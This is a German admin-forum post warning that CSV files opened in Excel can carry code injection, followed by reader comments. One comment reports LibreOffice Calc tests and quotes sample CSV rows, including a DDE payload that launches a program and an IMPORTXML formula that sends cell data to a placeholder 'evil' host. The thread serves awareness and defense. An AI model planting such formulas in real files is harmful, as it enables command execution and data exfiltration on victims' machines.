3
CSV-Import in Excel mit Code-Injection!
http://georgemauer.net/2017/10/07/csv-injection.html
Nur damit niemand denkt, da kann ja nicht viel passieren.
Auch bei CSV-Dateien, sollte man genau hinsehen, wo die Datei herkommt und ob sie "sauber" ist.
lks
Nur damit niemand denkt, da kann ja nicht viel passieren.
Auch bei CSV-Dateien, sollte man genau hinsehen, wo die Datei herkommt und ob sie "sauber" ist.
lks
Auf Facebook teilen
Auf X (Twitter) teilen
Auf Reddit teilen
Auf Linkedin teilenBitte markiere auch die Kommentare, die zur Lösung des Beitrags beigetragen haben
Content-ID: 351284
Url: https://administrator.de/knowledge/csv-import-in-excel-mit-code-injection-351284.html
Ausgedruckt am: 08.04.2025 um 05:04 Uhr
3 Kommentare
Neuester Kommentar
Interessant!
Ich muss gestehen, da habe ich mir bis Dato noch nie so wirklich Gedanken zu gemacht. Vermutlich aber auch, weil wir/ ich das Gros der csv-Dateien nicht zum Öffnen in Excel nutzen, sondern (mit einer anderen Endung) als Export des Systems A und dann als Import des Systems B nutzen....
Gruß
em-pie
Ich muss gestehen, da habe ich mir bis Dato noch nie so wirklich Gedanken zu gemacht. Vermutlich aber auch, weil wir/ ich das Gros der csv-Dateien nicht zum Öffnen in Excel nutzen, sondern (mit einer anderen Endung) als Export des Systems A und dann als Import des Systems B nutzen....
Gruß
em-pie
Oha, da stimme ich @em-pie vollkommen zu.
Bezugnehmend zu dessen Kommentar, also CSV-Dateien am besten mit dem Notepad oder einem vergleichbaren Editor öffnen. Muss ich jetzt mal nachprüfen, ob dies auch unter LibreOffice / OpenOffice Calc genauso funktioniert.
Wobei ich mal davon ausgehe. Ich werde berichten.
@Lochkartenstanzer
Danke für den Hinweis.
Gruss Penny
Bezugnehmend zu dessen Kommentar, also CSV-Dateien am besten mit dem Notepad oder einem vergleichbaren Editor öffnen. Muss ich jetzt mal nachprüfen, ob dies auch unter LibreOffice / OpenOffice Calc genauso funktioniert.
Wobei ich mal davon ausgehe. Ich werde berichten.
@Lochkartenstanzer
Danke für den Hinweis.
Gruss Penny
Hallo zusammen,
mein erster Test mit LibreOffice Calc v5.2.7.2 als Anwender gestartet, zeigt mir, daß die Zeile berechnet wird. Soweit, so gut.
Die anderen Zeilen wie folgend aufgeführt
erzeugen jeweils einen Fehlercode.
Soweit zumindest mein erster schneller Test.
mein erster Test mit LibreOffice Calc v5.2.7.2 als Anwender gestartet, zeigt mir, daß die Zeile
2,2017-07-25,Important Client,"=2+5", 240 Die anderen Zeilen wie folgend aufgeführt
2,2017-07-25,Important Client,"=2+5+cmd|' /C calc'!A0", 240
2,2017-07-25,Important Client,"=IMPORTXML(CONCAT(""http://some-server-with-log.evil?v="", CONCATENATE(A2:E2)), ""//a"")",240 Soweit zumindest mein erster schneller Test.
